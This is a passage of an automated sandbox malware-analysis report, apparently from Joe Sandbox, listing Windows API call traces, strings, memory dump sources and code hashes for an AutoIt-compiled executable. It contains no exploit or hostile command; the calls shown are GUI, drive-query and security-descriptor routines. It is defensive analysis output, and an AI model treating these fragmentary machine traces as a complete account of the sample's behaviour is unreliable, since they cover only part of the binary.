                                                                                                                                                                                                                                                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00AA7BBE
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(?,?), ref: 00AA7BCD
                                                                                                                                                                                                                                                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00AA7BF8
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000010), ref: 00AA7C00
                                                                                                                                                                                                                                                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00AA7C07
                                                                                                                                                                                                                                                                                                    • FrameRect.USER32(?,?,00000000), ref: 00AA7C16
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00AA7C1D
                                                                                                                                                                                                                                                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00AA7C68
                                                                                                                                                                                                                                                                                                    • FillRect.USER32(?,?,?), ref: 00AA7C9A
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00AA7CBC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: GetSysColor.USER32(00000012), ref: 00AA7E5B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: SetTextColor.GDI32(?,00AA7B2D), ref: 00AA7E5F
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: GetSysColorBrush.USER32(0000000F), ref: 00AA7E75
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: GetSysColor.USER32(0000000F), ref: 00AA7E80
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: GetSysColor.USER32(00000011), ref: 00AA7E9D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00AA7EAB
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: SelectObject.GDI32(?,00000000), ref: 00AA7EBC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: SetBkColor.GDI32(?,?), ref: 00AA7EC5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: SelectObject.GDI32(?,?), ref: 00AA7ED2
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: InflateRect.USER32(?,000000FF,000000FF), ref: 00AA7EF1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00AA7F08
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00AA7E22: GetWindowLongW.USER32(?,000000F0), ref: 00AA7F15
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4124339563-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: c18215b4c4b496acc80c63c447d918b005d01b01dba45c6acb77fbc9f31630a9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 818df5ece6d054aed58d77712d51c21a63ed2bfeaa9aa6c90162dd453411df8c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c18215b4c4b496acc80c63c447d918b005d01b01dba45c6acb77fbc9f31630a9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FFA16C72408302AFDB11DFA4DC48A6FBBA9FB4A324F100A19F9A3965E0D771D946CB51
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?,?), ref: 00A116B4
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00A52B07
                                                                                                                                                                                                                                                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00A52B40
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00A52F85
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A11802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00A11488,?,00000000,?,?,?,?,00A1145A,00000000,?), ref: 00A11865
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001053), ref: 00A52FC1
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00A52FD8
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00A52FEE
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?), ref: 00A52FF9
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 2760611726-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: ee9335d0264dc979a2e1a09c85269996852165d672e7566233974a76a77e2bf9
                                                                                                                                                                                                                                                                                                    • Instruction ID: fed85342afa558ce8837ae402656dde1bf36c3bf0323970da5f5f0cc368a1484
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee9335d0264dc979a2e1a09c85269996852165d672e7566233974a76a77e2bf9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D12D230600242AFC725DF54C984BA9BBF5FF46302F184569F9959B6A2C731EC8ACF91
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000), ref: 00A9319B
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00A932C7
                                                                                                                                                                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 00A93306
                                                                                                                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00A93316
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00A9335D
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00A93369
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00A933B2
                                                                                                                                                                                                                                                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00A933C1
                                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00A933D1
                                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00A933D5
                                                                                                                                                                                                                                                                                                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00A933E5
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A933EE
                                                                                                                                                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 00A933F7
                                                                                                                                                                                                                                                                                                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00A93423
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 00A9343A
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00A9347A
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00A9348E
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 00A9349F
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00A934D4
                                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00A934DF
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00A934EA
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00A934F4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                                                                                                                                                                                                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                                                                                                                                                                                                                                                    • API String ID: 2910397461-517079104
                                                                                                                                                                                                                                                                                                    • Opcode ID: a431e5e6297303f8e675eb8c4e745b2e2b6807e6cfe6e4ccf6b6b903bd12cc53
                                                                                                                                                                                                                                                                                                    • Instruction ID: 938efb73abb2f944f43907960e3fe30deb0f2c9a8d7b884d907215c5971c77ff
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a431e5e6297303f8e675eb8c4e745b2e2b6807e6cfe6e4ccf6b6b903bd12cc53
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6EB13D71A40216AFEB14DFA8CD89FAE7BB9EB49710F004115F915EB2D0DB74AD41CB50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 00A85532
                                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,00AADC30,?,\\.\,00AADCD0), ref: 00A8560F
                                                                                                                                                                                                                                                                                                    • SetErrorMode.KERNEL32(00000000,00AADC30,?,\\.\,00AADCD0), ref: 00A8577B
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorMode$DriveType
                                                                                                                                                                                                                                                                                                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                                                                                                                                                    • API String ID: 2907320926-4222207086
                                                                                                                                                                                                                                                                                                    • Opcode ID: ac81d25bc0f66cb14cec9cd12b1f43a7cddcbfe8c2408bc27899f455c5f759bd
                                                                                                                                                                                                                                                                                                    • Instruction ID: dda5ca73b13a655ebc9362e4a71b0f251cab48a7af63e1ea59d1b4c0b3d6683a
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac81d25bc0f66cb14cec9cd12b1f43a7cddcbfe8c2408bc27899f455c5f759bd
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 13619130E48905EFC728EF34CA919BDB7B2BF15350BA48866E847AB291E7319D41CB51
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00AA1BC4
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00AA1BD9
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00AA1BE0
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00AA1C35
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00AA1C55
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00AA1C89
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00AA1CA7
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00AA1CB9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,?), ref: 00AA1CCE
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00AA1CE1
                                                                                                                                                                                                                                                                                                    • IsWindowVisible.USER32(00000000), ref: 00AA1D3D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00AA1D58
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00AA1D6C
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 00AA1D84
                                                                                                                                                                                                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 00AA1DAA
                                                                                                                                                                                                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 00AA1DC4
                                                                                                                                                                                                                                                                                                    • CopyRect.USER32(?,?), ref: 00AA1DDB
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000412,00000000), ref: 00AA1E46
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                                                                                                                                                    • String ID: ($0$tooltips_class32
                                                                                                                                                                                                                                                                                                    • API String ID: 698492251-4156429822
                                                                                                                                                                                                                                                                                                    • Opcode ID: 75598398bf80a04a332af597558e576a923e20634545991b608d956622285176
                                                                                                                                                                                                                                                                                                    • Instruction ID: 8ad420381799f1fedc8e5d68ae9d028507ed2f44a00ffc3ad6d4425c318d7430
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75598398bf80a04a332af597558e576a923e20634545991b608d956622285176
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0AB17C71604311AFD714DF64C985BAAFBE5FF85310F00891CF99A9B2A1CB71E845CBA2
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00AA0D81
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA0DBB
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA0E25
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA0E8D
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00AA0F11
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00AA0F61
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AA0FA0
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A2FD52: _wcslen.LIBCMT ref: 00A2FD5D
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A72BA5
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A72B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00A72BD7
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                                                                                                                                                    • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                                                                                                                                                    • API String ID: 1103490817-719923060
                                                                                                                                                                                                                                                                                                    • Opcode ID: 4c3e8e7f7c51399cc49f8ad76a2d66d72a9ca553eef0e3831cbffe7f4e16237b
                                                                                                                                                                                                                                                                                                    • Instruction ID: f555f20a2f7abf224a007e7e4fe50e5c956d4b0e2c4101fe193c87821785546e
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4c3e8e7f7c51399cc49f8ad76a2d66d72a9ca553eef0e3831cbffe7f4e16237b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1EE1CE312083419FC714DF28CA5196AB3E6BF8A314F14896DF8969B3E1DB30ED45CB91
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A125F8
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000007), ref: 00A12600
                                                                                                                                                                                                                                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00A1262B
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000008), ref: 00A12633
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00A12658
                                                                                                                                                                                                                                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00A12675
                                                                                                                                                                                                                                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00A12685
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00A126B8
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00A126CC
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 00A126EA
                                                                                                                                                                                                                                                                                                    • GetStockObject.GDI32(00000011), ref: 00A12706
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A12711
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A119CD: GetCursorPos.USER32(?), ref: 00A119E1
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A119CD: ScreenToClient.USER32(00000000,?), ref: 00A119FE
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A119CD: GetAsyncKeyState.USER32(00000001), ref: 00A11A23
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A119CD: GetAsyncKeyState.USER32(00000002), ref: 00A11A3D
                                                                                                                                                                                                                                                                                                    • SetTimer.USER32(00000000,00000000,00000028,00A1199C), ref: 00A12738
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
• Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                                                                                                                                                    • String ID: AutoIt v3 GUI
                                                                                                                                                                                                                                                                                                    • API String ID: 1458621304-248962490
                                                                                                                                                                                                                                                                                                    • Opcode ID: 1d1b4b1f9b566f7d9a1f98850c10df99c76656466683850243e6b2bd8545016e
                                                                                                                                                                                                                                                                                                    • Instruction ID: c9f64fa6fd15038287094bb3e017fcace3b1a7b7ec2c43d28a2e128ceb87c5c4
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1d1b4b1f9b566f7d9a1f98850c10df99c76656466683850243e6b2bd8545016e
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B7B15971A0020A9FDF14DFA8CC95BEA7BB5FB88315F104229FA56AB2D0DB74D941CB50
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00A71A60
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00A714E7,?,?,?), ref: 00A71A6C
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00A714E7,?,?,?), ref: 00A71A7B
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00A714E7,?,?,?), ref: 00A71A82
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00A71A99
                                                                                                                                                                                                                                                                                                    • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00A71741
                                                                                                                                                                                                                                                                                                    • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00A71775
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00A7178C
                                                                                                                                                                                                                                                                                                    • GetAce.ADVAPI32(?,00000000,?), ref: 00A717C6
                                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00A717E2
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?), ref: 00A717F9
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00A71801
                                                                                                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00A71808
                                                                                                                                                                                                                                                                                                    • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00A71829
                                                                                                                                                                                                                                                                                                    • CopySid.ADVAPI32(00000000), ref: 00A71830
                                                                                                                                                                                                                                                                                                    • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00A7185F
                                                                                                                                                                                                                                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00A71881
                                                                                                                                                                                                                                                                                                    • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00A71893
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A718BA
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A718C1
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A718CA
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A718D1
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A718DA
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A718E1
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00A718ED
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A718F4
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71ADF: GetProcessHeap.KERNEL32(00000008,00A714FD,?,00000000,?,00A714FD,?), ref: 00A71AED
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A71ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00A714FD,?), ref: 00A71AF4
